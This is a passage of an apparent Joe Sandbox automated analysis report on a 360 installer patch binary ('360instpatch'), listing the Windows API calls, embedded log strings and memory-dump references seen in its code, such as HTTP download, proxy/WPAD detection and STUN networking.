                                                                                                                                                                                                              • String ID: [%d.%3d] AllocRange fail $[%d.%3d] AsyncStartHttp fail ErrorCode = %d(%s)$[%d.] SetFileLen %I64d
                                                                                                                                                                                                              • API String ID: 543293942-671058960
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%d.]No CheckFileMsg FileSize:%I64d , xrefs: 6BF0AE69
                                                                                                                                                                                                              • [%d.] CheckFile Start , xrefs: 6BF0AEA6
                                                                                                                                                                                                              • [%d.] Rename start , xrefs: 6BF0AF2F
                                                                                                                                                                                                              • [%d.] CheckFile p2s Start , xrefs: 6BF0AEEA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3_
                                                                                                                                                                                                              • String ID: [%d.] CheckFile Start $[%d.] CheckFile p2s Start $[%d.] Rename start $[%d.]No CheckFileMsg FileSize:%I64d
                                                                                                                                                                                                              • API String ID: 2427045233-3735358712
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00B22750: _vswprintf_s.LIBCMT ref: 00B22783
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000104,00000000), ref: 00B9291E
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32 ref: 00B9296D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00B929BD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseControlCreateDeviceFileHandle_vswprintf_s
                                                                                                                                                                                                              • String ID: %02X%02X%02X%02X%02X%02X$\\.\%s
                                                                                                                                                                                                              • API String ID: 2864800763-1525991222
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B486BD
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B486F8
                                                                                                                                                                                                              • GetClassNameW.USER32(?,00000000,00000104), ref: 00B4870B
                                                                                                                                                                                                                • Part of subcall function 00B27FA1: __wcsicoll.LIBCMT ref: 00B27FB9
                                                                                                                                                                                                              • IsDialogMessageW.USER32(?,?), ref: 00B48757
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClassDialogH_prolog3MessageName__wcsicoll_memset
                                                                                                                                                                                                              • String ID: EDIT
                                                                                                                                                                                                              • API String ID: 858151411-3080729518
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,00000000,00000000,00000000,00000003,00000080,00000000,?,?,6BEECDEF,?), ref: 6BEEC48D
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,6BEECDEF,?), ref: 6BEEC4A4
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,6BEECDEF,?), ref: 6BEEC499
                                                                                                                                                                                                                • Part of subcall function 6BF2405E: _memset.LIBCMT ref: 6BF24091
                                                                                                                                                                                                                • Part of subcall function 6BF2405E: wvnsprintfW.SHLWAPI(?,000003FF,6BFCC288,6BF0E1F9), ref: 6BF240AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • exception raised in method CFileMgr::IsFileExisting, parameter pFileName can not be null, xrefs: 6BEEC471
                                                                                                                                                                                                              • IsFileExisting Error = %d, xrefs: 6BEEC4D5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseCreateErrorFileHandleLast_memsetwvnsprintf
                                                                                                                                                                                                              • String ID: IsFileExisting Error = %d$exception raised in method CFileMgr::IsFileExisting, parameter pFileName can not be null
                                                                                                                                                                                                              • API String ID: 162527170-4251026172
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BF0191B
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF01926
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF01930
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF01940
                                                                                                                                                                                                                • Part of subcall function 6BF23FED: _memset.LIBCMT ref: 6BF24020
                                                                                                                                                                                                                • Part of subcall function 6BF23FED: wvnsprintfW.SHLWAPI(?,000003FF,?,00007148), ref: 6BF2403B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [P2SP_DetectIEProxySetting] cost %d ms, xrefs: 6BF0194E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick$H_prolog3_memsetwvnsprintf
                                                                                                                                                                                                              • String ID: [P2SP_DetectIEProxySetting] cost %d ms
                                                                                                                                                                                                              • API String ID: 876511985-3580160709
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCreateKeyExA.KERNEL32(?,?,00000000,6BF61038,00000000,00000001,00000000,?,?), ref: 6BEF78C9
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?), ref: 6BEF78EB
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,?,?), ref: 6BEF7900
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?), ref: 6BEF790D
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,?,?,?), ref: 6BEF7931
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryValue$AllocCreateErrorGlobalLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2249321745-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(?), ref: 00B7A58E
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00B7A5B9
                                                                                                                                                                                                              • BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 00B7A5D6
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00B7A5DE
                                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00B7A5F3
                                                                                                                                                                                                                • Part of subcall function 00B7A29F: GdipDrawImageRectI.GDIPLUS(?,00000000,?,?,?,?,?,?,00B7FC56,?,?,?,00000000,?,?), ref: 00B7A2C2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ObjectSelect$CompatibleCreateDeleteDrawGdipImageRect
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 240731188-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF30418
                                                                                                                                                                                                              • inet_addr.WS2_32(?), ref: 6BF30428
                                                                                                                                                                                                              • WSAAsyncGetHostByName.WS2_32(00000000,00000401,?,00000000,00000400), ref: 6BF3045C
                                                                                                                                                                                                              • WSASetLastError.WS2_32(00002733), ref: 6BF3046F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AsyncErrorHostLastName_memsetinet_addr
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1704644561-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B7E069
                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,00BFCDA4,?,?), ref: 00B7E07D
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B7E08D
                                                                                                                                                                                                              • GetTempFileNameW.KERNEL32(?,00B485B6,00000000,?,?,?,?,?,?,?), ref: 00B7E0A6
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?), ref: 00B7E0B3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileTemp_memset$DeleteNamePath
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 433304728-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000000,74DF23A0,?,?,6BF05E2D), ref: 6BF274BC
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?,?,?,6BF05E2D), ref: 6BF274C4
                                                                                                                                                                                                              • RegNotifyChangeKeyValue.KERNEL32(?,00000000,00000004,?,00000001,?,?,6BF05E2D), ref: 6BF274F9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ChangeEventNotifyObjectResetSingleValueWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1286042878-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __lock.LIBCMT ref: 00B94A1A
                                                                                                                                                                                                                • Part of subcall function 00BA339F: __mtinitlocknum.LIBCMT ref: 00BA33B5
                                                                                                                                                                                                                • Part of subcall function 00BA339F: __amsg_exit.LIBCMT ref: 00BA33C1
                                                                                                                                                                                                                • Part of subcall function 00BA339F: EnterCriticalSection.KERNEL32(?,?,?,00BA4EDB,0000000D,00BEEFE8,00000008,00B9EA68,?,00000000), ref: 00BA33C9
                                                                                                                                                                                                              • ___sbh_find_block.LIBCMT ref: 00B94A25
                                                                                                                                                                                                              • ___sbh_free_block.LIBCMT ref: 00B94A34
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,?,00BEE890,0000000C,00BA4E21,00000000,?,00BA05A7,?,00000001,?,?,00BA3329,00000018,00BEEF60,0000000C), ref: 00B94A64
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00BA05A7,?,00000001,?,?,00BA3329,00000018,00BEEF60,0000000C,00BA33BA,?,?,?,00BA4EDB,0000000D), ref: 00B94A75
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2714421763-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BEF6414
                                                                                                                                                                                                                • Part of subcall function 6BEF313B: __EH_prolog3_GS.LIBCMT ref: 6BEF3142
                                                                                                                                                                                                                • Part of subcall function 6BF38425: _malloc.LIBCMT ref: 6BF3843F
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BEF6452
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3_$_malloc_memset
                                                                                                                                                                                                              • String ID: [%d] Proxy = %d$[%d] Proxy0 = %d
                                                                                                                                                                                                              • API String ID: 4091186113-2032588536
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3__memcmp_memset
                                                                                                                                                                                                              • String ID: [360signdata]sign=
                                                                                                                                                                                                              • API String ID: 1379577869-1737267629
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BF329D0
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF329D7
                                                                                                                                                                                                                • Part of subcall function 6BF23F7C: _memset.LIBCMT ref: 6BF23FAF
                                                                                                                                                                                                                • Part of subcall function 6BF23F7C: wvnsprintfW.SHLWAPI(?,000003FF,?,?), ref: 6BF23FCA
                                                                                                                                                                                                                • Part of subcall function 6BF38425: _malloc.LIBCMT ref: 6BF3843F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountH_prolog3Tick_malloc_memsetwvnsprintf
                                                                                                                                                                                                              • String ID: Stun Begining$st.p.360.cn
                                                                                                                                                                                                              • API String ID: 1577093084-2775616079
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B4854B
                                                                                                                                                                                                                • Part of subcall function 00B95546: _malloc.LIBCMT ref: 00B95560
                                                                                                                                                                                                                • Part of subcall function 00B2A8EB: _wcsnlen.LIBCMT ref: 00B2A91D
                                                                                                                                                                                                                • Part of subcall function 00B7E037: _memset.LIBCMT ref: 00B7E069
                                                                                                                                                                                                                • Part of subcall function 00B7E037: GetTempPathW.KERNEL32(00000104,?,00BFCDA4,?,?), ref: 00B7E07D
                                                                                                                                                                                                                • Part of subcall function 00B7E037: _memset.LIBCMT ref: 00B7E08D
                                                                                                                                                                                                                • Part of subcall function 00B7E037: GetTempFileNameW.KERNEL32(?,00B485B6,00000000,?,?,?,?,?,?,?), ref: 00B7E0A6
                                                                                                                                                                                                                • Part of subcall function 00B7E037: DeleteFileW.KERNEL32(?,?,?,?,?,?,?), ref: 00B7E0B3
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00B485F7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileTemp_memset$CountDeleteH_prolog3NamePathTick_malloc_wcsnlen
                                                                                                                                                                                                              • String ID: !@tmpini%^&$?rd=%d
                                                                                                                                                                                                              • API String ID: 431327915-4013382025
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BF32F9A
                                                                                                                                                                                                              • htonl.WS2_32(?), ref: 6BF32FAD
                                                                                                                                                                                                                • Part of subcall function 6BEFB865: _memset.LIBCMT ref: 6BEFB896
                                                                                                                                                                                                                • Part of subcall function 6BEFB865: __swprintf.LIBCMT ref: 6BEFB8BB
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF32FF9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Stunt Dns resolve: %s:%d, xrefs: 6BF32FD7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountH_prolog3Tick__swprintf_memsethtonl
                                                                                                                                                                                                              • String ID: Stunt Dns resolve: %s:%d
                                                                                                                                                                                                              • API String ID: 2444062366-1183633912
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF04E4F: __EH_prolog3_GS.LIBCMT ref: 6BF04E56
                                                                                                                                                                                                                • Part of subcall function 6BF23F0C: _memset.LIBCMT ref: 6BF23F3E
                                                                                                                                                                                                                • Part of subcall function 6BF23F0C: wvnsprintfW.SHLWAPI(?,000003FF,?,?), ref: 6BF23F59
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 6BF055EC
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 6BF055FC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • _IsHaveEntClient:%d, xrefs: 6BF055BD
                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 6BF05606
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateEvent$H_prolog3__memsetwvnsprintf
                                                                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Internet Settings$_IsHaveEntClient:%d
                                                                                                                                                                                                              • API String ID: 1875430345-55523219
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSCEnumProtocols.WS2_32(00000000,00000000,00000000,?), ref: 6BEFAEA0
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000), ref: 6BEFAEBD
                                                                                                                                                                                                              • WSCEnumProtocols.WS2_32(00000000,00000000,00000000,?), ref: 6BEFAED0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EnumProtocols$AllocGlobal
                                                                                                                                                                                                              • String ID: G'
                                                                                                                                                                                                              • API String ID: 1234177745-1542159958
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF2C5EA
                                                                                                                                                                                                              • SendMessageW.USER32(6BFCC3F0,?,?,?), ref: 6BF2C5FC
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF2C604
                                                                                                                                                                                                                • Part of subcall function 6BF23FED: _memset.LIBCMT ref: 6BF24020
                                                                                                                                                                                                                • Part of subcall function 6BF23FED: wvnsprintfW.SHLWAPI(?,000003FF,?,00007148), ref: 6BF2403B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [CAsyncNetwork::SyncSendMsg] msg: %d cost: %d s, xrefs: 6BF2C61D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick$MessageSend_memsetwvnsprintf
                                                                                                                                                                                                              • String ID: [CAsyncNetwork::SyncSendMsg] msg: %d cost: %d s
                                                                                                                                                                                                              • API String ID: 3817034548-3777656696
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF0244B
                                                                                                                                                                                                                • Part of subcall function 6BF02364: _malloc.LIBCMT ref: 6BF02387
                                                                                                                                                                                                                • Part of subcall function 6BF02364: GetNetworkParams.IPHLPAPI(00000000,?), ref: 6BF0239D
                                                                                                                                                                                                                • Part of subcall function 6BF02364: _malloc.LIBCMT ref: 6BF023B3
                                                                                                                                                                                                                • Part of subcall function 6BF02364: GetNetworkParams.IPHLPAPI(00000000,?), ref: 6BF023C8
                                                                                                                                                                                                                • Part of subcall function 6BF02364: _memset.LIBCMT ref: 6BF023EF
                                                                                                                                                                                                                • Part of subcall function 6BF02364: __snwprintf.LIBCMT ref: 6BF02416
                                                                                                                                                                                                              • __snwprintf.LIBCMT ref: 6BF02475
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: NetworkParams__snwprintf_malloc$CountTick_memset
                                                                                                                                                                                                              • String ID: http://%s/wpad.dat$wpad
                                                                                                                                                                                                              • API String ID: 140397255-1948369278
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 6BF2E70D
                                                                                                                                                                                                                • Part of subcall function 6BF2CDE8: PostQuitMessage.USER32(00000000), ref: 6BF2CECB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessagePostProcQuitWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3873111417-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentDeleteFileH_prolog3Thread__wcsicoll
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3249433508-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B7E69E
                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00BDE544,0000005C,00000008,00B7E838,?,?,0000002C), ref: 00B7E75E
                                                                                                                                                                                                              • SHCreateDirectoryExW.SHELL32(00000000,00000000,00000000,?,?,0000002C), ref: 00B7E76B
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,0000002C), ref: 00B7E7B5
                                                                                                                                                                                                                • Part of subcall function 00B1DFB0: __CxxThrowException@8.LIBCMT ref: 00B1DFC2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateDirectoryErrorException@8ExistsFileH_prolog3LastPathThrow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3549841302-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(?), ref: 00B7A689
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00B7A69E
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00B7A6CA
                                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00B7A6DF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ObjectSelect$CompatibleCreateDelete
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 488333989-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BF305F7
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BF3060C
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(6BFCC570), ref: 6BF30619
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(6BFCC570), ref: 6BF306D4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$CurrentEnterH_prolog3LeaveThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1021104131-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B28116
                                                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 00B2813D
                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00B28158
                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00B2815F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
